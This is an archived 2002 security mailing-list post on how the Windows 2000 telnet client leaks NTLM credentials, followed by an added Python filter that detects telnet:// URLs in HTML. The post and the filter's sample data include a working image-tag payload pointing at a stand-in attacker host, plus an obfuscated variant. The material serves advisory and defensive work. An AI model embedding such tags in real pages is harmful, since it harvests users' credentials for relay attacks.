Firewall Wizards mailing list archives

Re: Danger of telnet on w2k (Was: re: Annoying pop-ups)


From: Mikael Olsson <mikael.olsson () clavister com>
Date: Wed, 30 Oct 2002 16:42:10 +0100



Mikael Olsson wrote:

PLUS port 23 (Telnet!)
     Sure, it isn't on by default, but people found ways to abuse DCOM to
     turn it on remotely. Uh oh.

I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".

If so, here's something you need to know: Microsoft embedded NTLM auth 
in telnet in w2k.  This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the 
currently logged on user whenever you telnet to an NTLM-enabled server.

This same data sent out can be relayed back to your box and used 
to log on to you without delay.  It can also be fed to l0phtcrack.


Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this.  All it needs is an image tag like
<img src="telnet://evilserver.int:2323">


Stuff that can help:

- Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp
  and install patch. The patch is to display a warning before NTLM
  is sent to stuff outside the local zone. However, we have seen the zone 
  schemes be subverted before, so don't rely on it.

- Block port 23 inbound to avoid the direct relay back to your telnet 
  port. Disabling the telnet service might be a good idea, but don't 
  rely on it.

- Run "telnet" without arguments. Type "unset ntlm".
  This prevents the telnet client from sending ntlm hashes at all.

- Blocking port 23 outbound will NOT help.

-- 
Mikael Olsson, Clavister AB
Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden
Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
Fax: +46 (0)660 122 50       WWW: http://www.clavister.com

Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."
_______________________________________________
firewall-wizards mailing list
firewall-wizards () honor icsalabs com
http://honor.icsalabs.com/mailman/listinfo/firewall-wizards
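The post names the delivery vector exactly: an image tag whose `src` points at a `telnet://` URL, which the browser hands to the telnet client without the user clicking anything. A proxy or mail gateway can refuse such pages before they reach a w2k desktop. The following stand-alone check is an added example, not code from the post, the list or Microsoft; it assumes a content filter that can feed HTML into Python, and the sample HTML (including the host names) is constructed for the example.

```python
"""Flag HTML that auto-fetches a resource through a telnet:// URL.

Added example (not part of the original post): a content-filter check a
proxy or mail gateway could run over HTML before it reaches a browser.
The sample HTML and the host names in it are constructed for the example.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes the browser fetches on page load, with no user interaction.
# An <a href> needs a click, so it is deliberately not in this set.
AUTO_FETCH_ATTRS = {"src", "background", "data", "poster"}
# Schemes to flag; the post only concerns telnet, so that is the default.
DEFAULT_FLAGGED_SCHEMES = frozenset({"telnet"})


class _RefCollector(HTMLParser):
    """Collect (tag, attribute, value) for every auto-fetched attribute."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.refs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser decodes character references in attribute values,
        # so an entity-obfuscated scheme like &#84;ELNET:// arrives decoded.
        for name, value in attrs:
            if value is not None and name.lower() in AUTO_FETCH_ATTRS:
                self.refs.append((tag.lower(), name.lower(), value))


def find_flagged_refs(html, flagged_schemes=DEFAULT_FLAGGED_SCHEMES):
    """Return (tag, attribute, url, scheme) for each auto-fetched URL whose
    scheme is in flagged_schemes.  Matching ignores scheme case and leading
    whitespace, both of which browsers tolerate in attribute values."""
    parser = _RefCollector()
    parser.feed(html)
    parser.close()
    hits = []
    for tag, attr, value in parser.refs:
        url = value.strip()
        scheme = urlsplit(url).scheme.lower()
        if scheme in flagged_schemes:
            hits.append((tag, attr, url, scheme))
    return hits


def page_is_suspicious(html, flagged_schemes=DEFAULT_FLAGGED_SCHEMES):
    """True when at least one auto-fetched resource uses a flagged scheme."""
    return bool(find_flagged_refs(html, flagged_schemes))


# Constructed sample: the tag from the post, an obfuscated variant with
# entity-encoded and upper-cased scheme plus leading whitespace, an ordinary
# image that must pass, and a link that needs a click and so is not flagged.
SAMPLE_HTML = """
<html><body>
<p>Annoying pop-up</p>
<img src="telnet://evilserver.int:2323">
<img src=" &#84;ELNET://evilserver.int:23/x.gif">
<img src="http://example.invalid/logo.gif">
<a href="telnet://evilserver.int">link (needs a click, not auto-fetched)</a>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_flagged_refs(SAMPLE_HTML):
        print("flagged:", hit)
```

The check is scheme-based rather than port-based on purpose: as the post notes, blocking port 23 outbound does not help, because the attacker's telnet listener can sit on any port (2323 in the post's own example), so the filter has to look at what the page asks the client to do, not where it connects.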